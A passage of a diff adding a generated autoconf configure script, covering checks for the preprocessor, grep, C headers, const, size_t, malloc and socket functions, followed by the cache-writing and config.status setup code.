wrong to rewrite CC. + # But if we don't then we get into trouble of one sort or another. + # A longer-term fix would be to have automake use am__CC in this case, + # and then we could set am__CC="\$(top_srcdir)/compile \$(CC)" + CC="$am_aux_dir/compile $CC" +fi + + + +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking whether ${MAKE-make} sets \$(MAKE)" >&5 +$as_echo_n "checking whether ${MAKE-make} sets \$(MAKE)... " >&6; } +set x ${MAKE-make} +ac_make=`$as_echo "$2" | sed 's/+/p/g; s/[^a-zA-Z0-9_]/_/g'` +if { as_var=ac_cv_prog_make_${ac_make}_set; eval "test \"\${$as_var+set}\" = set"; }; then : + $as_echo_n "(cached) " >&6 +else + cat >conftest.make <<\_ACEOF +SHELL = /bin/sh +all: + @echo '@@@%%%=$(MAKE)=@@@%%%' +_ACEOF +# GNU make sometimes prints "make[1]: Entering...", which would confuse us. +case `${MAKE-make} -f conftest.make 2>/dev/null` in + *@@@%%%=?*=@@@%%%*) + eval ac_cv_prog_make_${ac_make}_set=yes;; + *) + eval ac_cv_prog_make_${ac_make}_set=no;; +esac +rm -f conftest.make +fi +if eval test \$ac_cv_prog_make_${ac_make}_set = yes; then + { $as_echo "$as_me:${as_lineno-$LINENO}: result: yes" >&5 +$as_echo "yes" >&6; } + SET_MAKE= +else + { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 +$as_echo "no" >&6; } + SET_MAKE="MAKE=${MAKE-make}" +fi + + +# Checks for libraries. + +# Checks for header files. + +ac_ext=c +ac_cpp='$CPP $CPPFLAGS' +ac_compile='$CC -c $CFLAGS $CPPFLAGS conftest.$ac_ext >&5' +ac_link='$CC -o conftest$ac_exeext $CFLAGS $CPPFLAGS $LDFLAGS conftest.$ac_ext $LIBS >&5' +ac_compiler_gnu=$ac_cv_c_compiler_gnu +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking how to run the C preprocessor" >&5 +$as_echo_n "checking how to run the C preprocessor... " >&6; } +# On Suns, sometimes $CPP names a directory. +if test -n "$CPP" && test -d "$CPP"; then + CPP= +fi +if test -z "$CPP"; then + if test "${ac_cv_prog_CPP+set}" = set; then : + $as_echo_n "(cached) " >&6 +else + # Double quotes because CPP needs to be expanded + for CPP in "$CC -E" "$CC -E -traditional-cpp" "/lib/cpp" + do + ac_preproc_ok=false +for ac_c_preproc_warn_flag in '' yes +do + # Use a header file that comes with gcc, so configuring glibc + # with a fresh cross-compiler works. + # Prefer to if __STDC__ is defined, since + # exists even on freestanding compilers. + # On the NeXT, cc -E runs the code through the compiler's parser, + # not just through cpp. "Syntax error" is here to catch this case. + cat confdefs.h - <<_ACEOF >conftest.$ac_ext +/* end confdefs.h. */ +@%:@ifdef __STDC__ +@%:@ include +@%:@else +@%:@ include +@%:@endif + Syntax error +_ACEOF +if ac_fn_c_try_cpp "$LINENO"; then : + +else + # Broken: fails on valid input. +continue +fi +rm -f conftest.err conftest.$ac_ext + + # OK, works on sane cases. Now check whether nonexistent headers + # can be detected and how. + cat confdefs.h - <<_ACEOF >conftest.$ac_ext +/* end confdefs.h. */ +@%:@include +_ACEOF +if ac_fn_c_try_cpp "$LINENO"; then : + # Broken: success on invalid input. +continue +else + # Passes both tests. +ac_preproc_ok=: +break +fi +rm -f conftest.err conftest.$ac_ext + +done +# Because of `break', _AC_PREPROC_IFELSE's cleaning code was skipped. +rm -f conftest.err conftest.$ac_ext +if $ac_preproc_ok; then : + break +fi + + done + ac_cv_prog_CPP=$CPP + +fi + CPP=$ac_cv_prog_CPP +else + ac_cv_prog_CPP=$CPP +fi +{ $as_echo "$as_me:${as_lineno-$LINENO}: result: $CPP" >&5 +$as_echo "$CPP" >&6; } +ac_preproc_ok=false +for ac_c_preproc_warn_flag in '' yes +do + # Use a header file that comes with gcc, so configuring glibc + # with a fresh cross-compiler works. + # Prefer to if __STDC__ is defined, since + # exists even on freestanding compilers. + # On the NeXT, cc -E runs the code through the compiler's parser, + # not just through cpp. "Syntax error" is here to catch this case. + cat confdefs.h - <<_ACEOF >conftest.$ac_ext +/* end confdefs.h. */ +@%:@ifdef __STDC__ +@%:@ include +@%:@else +@%:@ include +@%:@endif + Syntax error +_ACEOF +if ac_fn_c_try_cpp "$LINENO"; then : + +else + # Broken: fails on valid input. +continue +fi +rm -f conftest.err conftest.$ac_ext + + # OK, works on sane cases. Now check whether nonexistent headers + # can be detected and how. + cat confdefs.h - <<_ACEOF >conftest.$ac_ext +/* end confdefs.h. */ +@%:@include +_ACEOF +if ac_fn_c_try_cpp "$LINENO"; then : + # Broken: success on invalid input. +continue +else + # Passes both tests. +ac_preproc_ok=: +break +fi +rm -f conftest.err conftest.$ac_ext + +done +# Because of `break', _AC_PREPROC_IFELSE's cleaning code was skipped. +rm -f conftest.err conftest.$ac_ext +if $ac_preproc_ok; then : + +else + { { $as_echo "$as_me:${as_lineno-$LINENO}: error: in \`$ac_pwd':" >&5 +$as_echo "$as_me: error: in \`$ac_pwd':" >&2;} +as_fn_error "C preprocessor \"$CPP\" fails sanity check +See \`config.log' for more details." "$LINENO" 5; } +fi + +ac_ext=c +ac_cpp='$CPP $CPPFLAGS' +ac_compile='$CC -c $CFLAGS $CPPFLAGS conftest.$ac_ext >&5' +ac_link='$CC -o conftest$ac_exeext $CFLAGS $CPPFLAGS $LDFLAGS conftest.$ac_ext $LIBS >&5' +ac_compiler_gnu=$ac_cv_c_compiler_gnu + + +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking for grep that handles long lines and -e" >&5 +$as_echo_n "checking for grep that handles long lines and -e... " >&6; } +if test "${ac_cv_path_GREP+set}" = set; then : + $as_echo_n "(cached) " >&6 +else + if test -z "$GREP"; then + ac_path_GREP_found=false + # Loop through the user's path and test for each of PROGNAME-LIST + as_save_IFS=$IFS; IFS=$PATH_SEPARATOR +for as_dir in $PATH$PATH_SEPARATOR/usr/xpg4/bin +do + IFS=$as_save_IFS + test -z "$as_dir" && as_dir=. + for ac_prog in grep ggrep; do + for ac_exec_ext in '' $ac_executable_extensions; do + ac_path_GREP="$as_dir/$ac_prog$ac_exec_ext" + { test -f "$ac_path_GREP" && $as_test_x "$ac_path_GREP"; } || continue +# Check for GNU ac_path_GREP and select it if it is found. + # Check for GNU $ac_path_GREP +case `"$ac_path_GREP" --version 2>&1` in +*GNU*) + ac_cv_path_GREP="$ac_path_GREP" ac_path_GREP_found=:;; +*) + ac_count=0 + $as_echo_n 0123456789 >"conftest.in" + while : + do + cat "conftest.in" "conftest.in" >"conftest.tmp" + mv "conftest.tmp" "conftest.in" + cp "conftest.in" "conftest.nl" + $as_echo 'GREP' >> "conftest.nl" + "$ac_path_GREP" -e 'GREP$' -e '-(cannot match)-' < "conftest.nl" >"conftest.out" 2>/dev/null || break + diff "conftest.out" "conftest.nl" >/dev/null 2>&1 || break + as_fn_arith $ac_count + 1 && ac_count=$as_val + if test $ac_count -gt ${ac_path_GREP_max-0}; then + # Best one so far, save it but keep looking for a better one + ac_cv_path_GREP="$ac_path_GREP" + ac_path_GREP_max=$ac_count + fi + # 10*(2^10) chars as input seems more than enough + test $ac_count -gt 10 && break + done + rm -f conftest.in conftest.tmp conftest.nl conftest.out;; +esac + + $ac_path_GREP_found && break 3 + done + done + done +IFS=$as_save_IFS + if test -z "$ac_cv_path_GREP"; then + as_fn_error "no acceptable grep could be found in $PATH$PATH_SEPARATOR/usr/xpg4/bin" "$LINENO" 5 + fi +else + ac_cv_path_GREP=$GREP +fi + +fi +{ $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_cv_path_GREP" >&5 +$as_echo "$ac_cv_path_GREP" >&6; } + GREP="$ac_cv_path_GREP" + + +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking for egrep" >&5 +$as_echo_n "checking for egrep... " >&6; } +if test "${ac_cv_path_EGREP+set}" = set; then : + $as_echo_n "(cached) " >&6 +else + if echo a | $GREP -E '(a|b)' >/dev/null 2>&1 + then ac_cv_path_EGREP="$GREP -E" + else + if test -z "$EGREP"; then + ac_path_EGREP_found=false + # Loop through the user's path and test for each of PROGNAME-LIST + as_save_IFS=$IFS; IFS=$PATH_SEPARATOR +for as_dir in $PATH$PATH_SEPARATOR/usr/xpg4/bin +do + IFS=$as_save_IFS + test -z "$as_dir" && as_dir=. + for ac_prog in egrep; do + for ac_exec_ext in '' $ac_executable_extensions; do + ac_path_EGREP="$as_dir/$ac_prog$ac_exec_ext" + { test -f "$ac_path_EGREP" && $as_test_x "$ac_path_EGREP"; } || continue +# Check for GNU ac_path_EGREP and select it if it is found. + # Check for GNU $ac_path_EGREP +case `"$ac_path_EGREP" --version 2>&1` in +*GNU*) + ac_cv_path_EGREP="$ac_path_EGREP" ac_path_EGREP_found=:;; +*) + ac_count=0 + $as_echo_n 0123456789 >"conftest.in" + while : + do + cat "conftest.in" "conftest.in" >"conftest.tmp" + mv "conftest.tmp" "conftest.in" + cp "conftest.in" "conftest.nl" + $as_echo 'EGREP' >> "conftest.nl" + "$ac_path_EGREP" 'EGREP$' < "conftest.nl" >"conftest.out" 2>/dev/null || break + diff "conftest.out" "conftest.nl" >/dev/null 2>&1 || break + as_fn_arith $ac_count + 1 && ac_count=$as_val + if test $ac_count -gt ${ac_path_EGREP_max-0}; then + # Best one so far, save it but keep looking for a better one + ac_cv_path_EGREP="$ac_path_EGREP" + ac_path_EGREP_max=$ac_count + fi + # 10*(2^10) chars as input seems more than enough + test $ac_count -gt 10 && break + done + rm -f conftest.in conftest.tmp conftest.nl conftest.out;; +esac + + $ac_path_EGREP_found && break 3 + done + done + done +IFS=$as_save_IFS + if test -z "$ac_cv_path_EGREP"; then + as_fn_error "no acceptable egrep could be found in $PATH$PATH_SEPARATOR/usr/xpg4/bin" "$LINENO" 5 + fi +else + ac_cv_path_EGREP=$EGREP +fi + + fi +fi +{ $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_cv_path_EGREP" >&5 +$as_echo "$ac_cv_path_EGREP" >&6; } + EGREP="$ac_cv_path_EGREP" + + +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking for ANSI C header files" >&5 +$as_echo_n "checking for ANSI C header files... " >&6; } +if test "${ac_cv_header_stdc+set}" = set; then : + $as_echo_n "(cached) " >&6 +else + cat confdefs.h - <<_ACEOF >conftest.$ac_ext +/* end confdefs.h. */ +#include +#include +#include +#include + +int +main () +{ + + ; + return 0; +} +_ACEOF +if ac_fn_c_try_compile "$LINENO"; then : + ac_cv_header_stdc=yes +else + ac_cv_header_stdc=no +fi +rm -f core conftest.err conftest.$ac_objext conftest.$ac_ext + +if test $ac_cv_header_stdc = yes; then + # SunOS 4.x string.h does not declare mem*, contrary to ANSI. + cat confdefs.h - <<_ACEOF >conftest.$ac_ext +/* end confdefs.h. */ +#include + +_ACEOF +if (eval "$ac_cpp conftest.$ac_ext") 2>&5 | + $EGREP "memchr" >/dev/null 2>&1; then : + +else + ac_cv_header_stdc=no +fi +rm -f conftest* + +fi + +if test $ac_cv_header_stdc = yes; then + # ISC 2.0.2 stdlib.h does not declare free, contrary to ANSI. + cat confdefs.h - <<_ACEOF >conftest.$ac_ext +/* end confdefs.h. */ +#include + +_ACEOF +if (eval "$ac_cpp conftest.$ac_ext") 2>&5 | + $EGREP "free" >/dev/null 2>&1; then : + +else + ac_cv_header_stdc=no +fi +rm -f conftest* + +fi + +if test $ac_cv_header_stdc = yes; then + # /bin/cc in Irix-4.0.5 gets non-ANSI ctype macros unless using -ansi. + if test "$cross_compiling" = yes; then : + : +else + cat confdefs.h - <<_ACEOF >conftest.$ac_ext +/* end confdefs.h. */ +#include +#include +#if ((' ' & 0x0FF) == 0x020) +# define ISLOWER(c) ('a' <= (c) && (c) <= 'z') +# define TOUPPER(c) (ISLOWER(c) ? 'A' + ((c) - 'a') : (c)) +#else +# define ISLOWER(c) \ + (('a' <= (c) && (c) <= 'i') \ + || ('j' <= (c) && (c) <= 'r') \ + || ('s' <= (c) && (c) <= 'z')) +# define TOUPPER(c) (ISLOWER(c) ? ((c) | 0x40) : (c)) +#endif + +#define XOR(e, f) (((e) && !(f)) || (!(e) && (f))) +int +main () +{ + int i; + for (i = 0; i < 256; i++) + if (XOR (islower (i), ISLOWER (i)) + || toupper (i) != TOUPPER (i)) + return 2; + return 0; +} +_ACEOF +if ac_fn_c_try_run "$LINENO"; then : + +else + ac_cv_header_stdc=no +fi +rm -f core *.core core.conftest.* gmon.out bb.out conftest$ac_exeext \ + conftest.$ac_objext conftest.beam conftest.$ac_ext +fi + +fi +fi +{ $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_cv_header_stdc" >&5 +$as_echo "$ac_cv_header_stdc" >&6; } +if test $ac_cv_header_stdc = yes; then + +$as_echo "@%:@define STDC_HEADERS 1" >>confdefs.h + +fi + +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking for sys/wait.h that is POSIX.1 compatible" >&5 +$as_echo_n "checking for sys/wait.h that is POSIX.1 compatible... " >&6; } +if test "${ac_cv_header_sys_wait_h+set}" = set; then : + $as_echo_n "(cached) " >&6 +else + cat confdefs.h - <<_ACEOF >conftest.$ac_ext +/* end confdefs.h. */ +#include +#include +#ifndef WEXITSTATUS +# define WEXITSTATUS(stat_val) ((unsigned int) (stat_val) >> 8) +#endif +#ifndef WIFEXITED +# define WIFEXITED(stat_val) (((stat_val) & 255) == 0) +#endif + +int +main () +{ + int s; + wait (&s); + s = WIFEXITED (s) ? WEXITSTATUS (s) : 1; + ; + return 0; +} +_ACEOF +if ac_fn_c_try_compile "$LINENO"; then : + ac_cv_header_sys_wait_h=yes +else + ac_cv_header_sys_wait_h=no +fi +rm -f core conftest.err conftest.$ac_objext conftest.$ac_ext +fi +{ $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_cv_header_sys_wait_h" >&5 +$as_echo "$ac_cv_header_sys_wait_h" >&6; } +if test $ac_cv_header_sys_wait_h = yes; then + +$as_echo "@%:@define HAVE_SYS_WAIT_H 1" >>confdefs.h + +fi + +# On IRIX 5.3, sys/types and inttypes.h are conflicting. +for ac_header in sys/types.h sys/stat.h stdlib.h string.h memory.h strings.h \ + inttypes.h stdint.h unistd.h +do : + as_ac_Header=`$as_echo "ac_cv_header_$ac_header" | $as_tr_sh` +ac_fn_c_check_header_compile "$LINENO" "$ac_header" "$as_ac_Header" "$ac_includes_default +" +eval as_val=\$$as_ac_Header + if test "x$as_val" = x""yes; then : + cat >>confdefs.h <<_ACEOF +@%:@define `$as_echo "HAVE_$ac_header" | $as_tr_cpp` 1 +_ACEOF + +fi + +done + + +for ac_header in fcntl.h limits.h netdb.h netinet/in.h stdlib.h string.h sys/ioctl.h sys/socket.h sys/timeb.h syslog.h unistd.h +do : + as_ac_Header=`$as_echo "ac_cv_header_$ac_header" | $as_tr_sh` +ac_fn_c_check_header_mongrel "$LINENO" "$ac_header" "$as_ac_Header" "$ac_includes_default" +eval as_val=\$$as_ac_Header + if test "x$as_val" = x""yes; then : + cat >>confdefs.h <<_ACEOF +@%:@define `$as_echo "HAVE_$ac_header" | $as_tr_cpp` 1 +_ACEOF + +fi + +done + + +# Checks for typedefs, structures, and compiler characteristics. +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking for an ANSI C-conforming const" >&5 +$as_echo_n "checking for an ANSI C-conforming const... " >&6; } +if test "${ac_cv_c_const+set}" = set; then : + $as_echo_n "(cached) " >&6 +else + cat confdefs.h - <<_ACEOF >conftest.$ac_ext +/* end confdefs.h. */ + +int +main () +{ +/* FIXME: Include the comments suggested by Paul. */ +#ifndef __cplusplus + /* Ultrix mips cc rejects this. */ + typedef int charset[2]; + const charset cs; + /* SunOS 4.1.1 cc rejects this. */ + char const *const *pcpcc; + char **ppc; + /* NEC SVR4.0.2 mips cc rejects this. */ + struct point {int x, y;}; + static struct point const zero = {0,0}; + /* AIX XL C 1.02.0.0 rejects this. + It does not let you subtract one const X* pointer from another in + an arm of an if-expression whose if-part is not a constant + expression */ + const char *g = "string"; + pcpcc = &g + (g ? g-g : 0); + /* HPUX 7.0 cc rejects these. */ + ++pcpcc; + ppc = (char**) pcpcc; + pcpcc = (char const *const *) ppc; + { /* SCO 3.2v4 cc rejects this. */ + char *t; + char const *s = 0 ? (char *) 0 : (char const *) 0; + + *t++ = 0; + if (s) return 0; + } + { /* Someone thinks the Sun supposedly-ANSI compiler will reject this. */ + int x[] = {25, 17}; + const int *foo = &x[0]; + ++foo; + } + { /* Sun SC1.0 ANSI compiler rejects this -- but not the above. */ + typedef const int *iptr; + iptr p = 0; + ++p; + } + { /* AIX XL C 1.02.0.0 rejects this saying + "k.c", line 2.27: 1506-025 (S) Operand must be a modifiable lvalue. */ + struct s { int j; const int *ap[3]; }; + struct s *b; b->j = 5; + } + { /* ULTRIX-32 V3.1 (Rev 9) vcc rejects this */ + const int foo = 10; + if (!foo) return 0; + } + return !cs[0] && !zero.x; +#endif + + ; + return 0; +} +_ACEOF +if ac_fn_c_try_compile "$LINENO"; then : + ac_cv_c_const=yes +else + ac_cv_c_const=no +fi +rm -f core conftest.err conftest.$ac_objext conftest.$ac_ext +fi +{ $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_cv_c_const" >&5 +$as_echo "$ac_cv_c_const" >&6; } +if test $ac_cv_c_const = no; then + +$as_echo "@%:@define const /**/" >>confdefs.h + +fi + +ac_fn_c_check_type "$LINENO" "size_t" "ac_cv_type_size_t" "$ac_includes_default" +if test "x$ac_cv_type_size_t" = x""yes; then : + +else + +cat >>confdefs.h <<_ACEOF +@%:@define size_t unsigned int +_ACEOF + +fi + + +# Checks for library functions. +for ac_header in stdlib.h +do : + ac_fn_c_check_header_mongrel "$LINENO" "stdlib.h" "ac_cv_header_stdlib_h" "$ac_includes_default" +if test "x$ac_cv_header_stdlib_h" = x""yes; then : + cat >>confdefs.h <<_ACEOF +@%:@define HAVE_STDLIB_H 1 +_ACEOF + +fi + +done + +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking for GNU libc compatible malloc" >&5 +$as_echo_n "checking for GNU libc compatible malloc... " >&6; } +if test "${ac_cv_func_malloc_0_nonnull+set}" = set; then : + $as_echo_n "(cached) " >&6 +else + if test "$cross_compiling" = yes; then : + ac_cv_func_malloc_0_nonnull=no +else + cat confdefs.h - <<_ACEOF >conftest.$ac_ext +/* end confdefs.h. */ +#if defined STDC_HEADERS || defined HAVE_STDLIB_H +# include +#else +char *malloc (); +#endif + +int +main () +{ +return ! malloc (0); + ; + return 0; +} +_ACEOF +if ac_fn_c_try_run "$LINENO"; then : + ac_cv_func_malloc_0_nonnull=yes +else + ac_cv_func_malloc_0_nonnull=no +fi +rm -f core *.core core.conftest.* gmon.out bb.out conftest$ac_exeext \ + conftest.$ac_objext conftest.beam conftest.$ac_ext +fi + +fi +{ $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_cv_func_malloc_0_nonnull" >&5 +$as_echo "$ac_cv_func_malloc_0_nonnull" >&6; } +if test $ac_cv_func_malloc_0_nonnull = yes; then : + +$as_echo "@%:@define HAVE_MALLOC 1" >>confdefs.h + +else + $as_echo "@%:@define HAVE_MALLOC 0" >>confdefs.h + + case " $LIB@&t@OBJS " in + *" malloc.$ac_objext "* ) ;; + *) LIB@&t@OBJS="$LIB@&t@OBJS malloc.$ac_objext" + ;; +esac + + +$as_echo "@%:@define malloc rpl_malloc" >>confdefs.h + +fi + + +for ac_func in inet_ntoa memset socket +do : + as_ac_var=`$as_echo "ac_cv_func_$ac_func" | $as_tr_sh` +ac_fn_c_check_func "$LINENO" "$ac_func" "$as_ac_var" +eval as_val=\$$as_ac_var + if test "x$as_val" = x""yes; then : + cat >>confdefs.h <<_ACEOF +@%:@define `$as_echo "HAVE_$ac_func" | $as_tr_cpp` 1 +_ACEOF + +fi +done + + +ac_config_files="$ac_config_files Makefile src/Makefile tools/Makefile" + +cat >confcache <<\_ACEOF +# This file is a shell script that caches the results of configure +# tests run on this system so they can be shared between configure +# scripts and configure runs, see configure's option --config-cache. +# It is not useful on other systems. If it contains results you don't +# want to keep, you may remove or edit it. +# +# config.status only pays attention to the cache file if you give it +# the --recheck option to rerun configure. +# +# `ac_cv_env_foo' variables (set or unset) will be overridden when +# loading this file, other *unset* `ac_cv_foo' will be assigned the +# following values. + +_ACEOF + +# The following way of writing the cache mishandles newlines in values, +# but we know of no workaround that is simple, portable, and efficient. +# So, we kill variables containing newlines. +# Ultrix sh set writes to stderr and can't be redirected directly, +# and sets the high bit in the cache file unless we assign to the vars. +( + for ac_var in `(set) 2>&1 | sed -n 's/^\([a-zA-Z_][a-zA-Z0-9_]*\)=.*/\1/p'`; do + eval ac_val=\$$ac_var + case $ac_val in #( + *${as_nl}*) + case $ac_var in #( + *_cv_*) { $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: cache variable $ac_var contains a newline" >&5 +$as_echo "$as_me: WARNING: cache variable $ac_var contains a newline" >&2;} ;; + esac + case $ac_var in #( + _ | IFS | as_nl) ;; #( + BASH_ARGV | BASH_SOURCE) eval $ac_var= ;; #( + *) { eval $ac_var=; unset $ac_var;} ;; + esac ;; + esac + done + + (set) 2>&1 | + case $as_nl`(ac_space=' '; set) 2>&1` in #( + *${as_nl}ac_space=\ *) + # `set' does not quote correctly, so add quotes: double-quote + # substitution turns \\\\ into \\, and sed turns \\ into \. + sed -n \ + "s/'/'\\\\''/g; + s/^\\([_$as_cr_alnum]*_cv_[_$as_cr_alnum]*\\)=\\(.*\\)/\\1='\\2'/p" + ;; #( + *) + # `set' quotes correctly as required by POSIX, so do not add quotes. + sed -n "/^[_$as_cr_alnum]*_cv_[_$as_cr_alnum]*=/p" + ;; + esac | + sort +) | + sed ' + /^ac_cv_env_/b end + t clear + :clear + s/^\([^=]*\)=\(.*[{}].*\)$/test "${\1+set}" = set || &/ + t end + s/^\([^=]*\)=\(.*\)$/\1=${\1=\2}/ + :end' >>confcache +if diff "$cache_file" confcache >/dev/null 2>&1; then :; else + if test -w "$cache_file"; then + test "x$cache_file" != "x/dev/null" && + { $as_echo "$as_me:${as_lineno-$LINENO}: updating cache $cache_file" >&5 +$as_echo "$as_me: updating cache $cache_file" >&6;} + cat confcache >$cache_file + else + { $as_echo "$as_me:${as_lineno-$LINENO}: not updating unwritable cache $cache_file" >&5 +$as_echo "$as_me: not updating unwritable cache $cache_file" >&6;} + fi +fi +rm -f confcache + +test "x$prefix" = xNONE && prefix=$ac_default_prefix +# Let make expand exec_prefix. +test "x$exec_prefix" = xNONE && exec_prefix='${prefix}' + +DEFS=-DHAVE_CONFIG_H + +ac_libobjs= +ac_ltlibobjs= +for ac_i in : $LIB@&t@OBJS; do test "x$ac_i" = x: && continue + # 1. Remove the extension, and $U if already installed. + ac_script='s/\$U\././;s/\.o$//;s/\.obj$//' + ac_i=`$as_echo "$ac_i" | sed "$ac_script"` + # 2. Prepend LIBOBJDIR. When used with automake>=1.10 LIBOBJDIR + # will be set to the directory where LIBOBJS objects are built. + as_fn_append ac_libobjs " \${LIBOBJDIR}$ac_i\$U.$ac_objext" + as_fn_append ac_ltlibobjs " \${LIBOBJDIR}$ac_i"'$U.lo' +done +LIB@&t@OBJS=$ac_libobjs + +LTLIBOBJS=$ac_ltlibobjs + + + if test -n "$EXEEXT"; then + am__EXEEXT_TRUE= + am__EXEEXT_FALSE='#' +else + am__EXEEXT_TRUE='#' + am__EXEEXT_FALSE= +fi + +if test -z "${AMDEP_TRUE}" && test -z "${AMDEP_FALSE}"; then + as_fn_error "conditional \"AMDEP\" was never defined. +Usually this means the macro was only invoked conditionally." "$LINENO" 5 +fi +if test -z "${am__fastdepCXX_TRUE}" && test -z "${am__fastdepCXX_FALSE}"; then + as_fn_error "conditional \"am__fastdepCXX\" was never defined. +Usually this means the macro was only invoked conditionally." "$LINENO" 5 +fi +if test -z "${am__fastdepCC_TRUE}" && test -z "${am__fastdepCC_FALSE}"; then + as_fn_error "conditional \"am__fastdepCC\" was never defined. +Usually this means the macro was only invoked conditionally." "$LINENO" 5 +fi + +: ${CONFIG_STATUS=./config.status} +ac_write_fail=0 +ac_clean_files_save=$ac_clean_files +ac_clean_files="$ac_clean_files $CONFIG_STATUS" +{ $as_echo "$as_me:${as_lineno-$LINENO}: creating $CONFIG_STATUS" >&5 +$as_echo "$as_me: creating $CONFIG_STATUS" >&6;} +as_write_fail=0 +cat >$CONFIG_STATUS <<_ASEOF || as_write_fail=1 +#! $SHELL +# Generated by $as_me. +# Run this file to recreate the current configuration. +# Compiler output produced by configure, useful for debugging +# configure, is in config.log if it exists. + +debug=false +ac_cs_recheck=false +ac_cs_silent=false + +SHELL=\${CONFIG_SHELL-$SHELL} +export SHELL +_ASEOF +cat >>$CONFIG_STATUS <<\_ASEOF || as_write_fail=1 +## -------------------- ## +## M4sh Initialization. ## +## -------------------- ## + +# Be more Bourne compatible +DUALCASE=1; export DUALCASE # for MKS sh +if test -n "${ZSH_VERSION+set}" && (emulate sh) >/dev/null 2>&1; then : + emulate sh + NULLCMD=: + # Pre-4.2 versions of Zsh do word splitting on ${1+"$@"}, which + # is contrary to our usage. Disable this feature. + alias -g '${1+"$@"}'='"$@"' + setopt NO_GLOB_SUBST +else + case `(set -o) 2>/dev/null` in @%:@( + *posix*) : + set -o posix ;; @%:@( + *) : + ;; +esac +fi + + +as_nl=' +' +export as_nl +# Printing a long string crashes Solaris 7 /usr/bin/printf. +as_echo='\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\' +as_echo=$as_echo$as_echo$as_echo$as_echo$as_echo +as_echo=$as_echo$as_echo$as_echo$as_echo$as_echo$as_echo +# Prefer a ksh shell builtin over an external printf program on Solaris, +# but without wasting forks for bash or zsh. +if test -z "$BASH_VERSION$ZSH_VERSION" \ + && (test "X`print -r -- $as_echo`" = "X$as_echo") 2>/dev/null; then + as_echo='print -r --' + as_echo_n='print -rn --' +elif (test "X`printf %s $as_echo`" = "X$as_echo") 2>/dev/null; then + as_echo='printf %s\n' + as_echo_n='printf %s' +else + if test "X`(/usr/ucb/echo -n -n $as_echo) 2>/dev/null`" = "X-n $as_echo"; then + as_echo_body='eval /usr/ucb/echo -n "$1$as_nl"' + as_echo_n='/usr/ucb/echo -n' + else + as_echo_body='eval expr "X$1" : "X\\(.*\\)"' + as_echo_n_body='eval + arg=$1; + case $arg in @%:@( + *"$as_nl"*) + expr "X$arg" : "X\\(.*\\)$as_nl"; + arg=`expr "X$arg" : ".*$as_nl\\(.*\\)"`;; + esac; + expr "X$arg" : "X\\(.*\\)" | tr -d "$as_nl" + ' + export as_echo_n_body + as_echo_n='sh -c $as_echo_n_body as_echo' + fi + export as_echo_body + as_echo='sh -c $as_echo_body as_echo' +fi + +# The user is always right. +if test "${PATH_SEPARATOR+set}" != set; then + PATH_SEPARATOR=: + (PATH='/bin;/bin'; FPATH=$PATH; sh -c :) >/dev/null 2>&1 && { + (PATH='/bin:/bin'; FPATH=$PATH; sh -c :) >/dev/null 2>&1 || + PATH_SEPARATOR=';' + } +fi + + +# IFS +# We need space, tab and new line, in precisely that order. Quoting is +# there to prevent editors from complaining about space-tab. +# (If _AS_PATH_WALK were called with IFS unset, it would disable word +# splitting by setting IFS to empty value.) +IFS=" "" $as_nl" + +# Find who we are. Look in the path if we contain no directory separator. +case $0 in @%:@(( + *[\\/]* ) as_myself=$0 ;; + *) as_save_IFS=$IFS; IFS=$PATH_SEPARATOR +for as_dir in $PATH +do + IFS=$as_save_IFS + test -z "$as_dir" && as_dir=. + test -r "$as_dir/$0" && as_myself=$as_dir/$0 && break + done +IFS=$as_save_IFS + + ;; +esac +# We did not find ourselves, most probably we were run as `sh COMMAND' +# in which case we are not to be found in the path. +if test "x$as_myself" = x; then + as_myself=$0 +fi +if test ! -f "$as_myself"; then + $as_echo "$as_myself: error: cannot find myself; rerun with an absolute file name" >&2 + exit 1 +fi + +# Unset variables that we do not need and which cause bugs (e.g. in +# pre-3.0 UWIN ksh). But do not cause bugs in bash 2.01; the "|| exit 1" +# suppresses any "Segmentation fault" message there. '((' could +# trigger a bug in pdksh 5.2.14. +for as_var in BASH_ENV ENV MAIL MAILPATH +do eval test x\${$as_var+set} = xset \ + && ( (unset $as_var) || exit 1) >/dev/null 2>&1 && unset $as_var || : +done +PS1='$ ' +PS2='> ' +PS4='+ ' + +# NLS nuisances. +LC_ALL=C +export LC_ALL +LANGUAGE=C +export LANGUAGE + +# CDPATH. +(unset CDPATH) >/dev/null 2>&1 && unset CDPATH + + +@%:@ as_fn_error ERROR [LINENO LOG_FD] +@%:@ --------------------------------- +@%:@ Output "`basename @S|@0`: error: ERROR" to stderr. If LINENO and LOG_FD are +@%:@ provided, also output the error to LOG_FD, referencing LINENO. Then exit the +@%:@ script with status @S|@?, using 1 if that was 0. +as_fn_error () +{ + as_status=$?; test $as_status -eq 0 && as_status=1 + if test "$3"; then + as_lineno=${as_lineno-"$2"} as_lineno_stack=as_lineno_stack=$as_lineno_stack + $as_echo "$as_me:${as_lineno-$LINENO}: error: $1" >&$3 + fi + $as_echo "$as_me: error: $1" >&2 + as_fn_exit $as_status +} @%:@ as_fn_error + + +@%:@ as_fn_set_status STATUS +@%:@ ----------------------- +@%:@ Set @S|@? to STATUS, without forking. +as_fn_set_status () +{ + return $1 +} @%:@ as_fn_set_status + +@%:@ as_fn_exit STATUS +@%:@ ----------------- +@%:@ Exit the shell with STATUS, even in a "trap 0" or "set -e" context. +as_fn_exit () +{ + set +e + as_fn_set_status $1 + exit $1 +} @%:@ as_fn_exit + +@%:@ as_fn_unset VAR +@%:@ --------------- +@%:@ Portably unset VAR. +as_fn_unset () +{ + { eval $1=; unset $1;} +} +as_unset=as_fn_unset +@%:@ 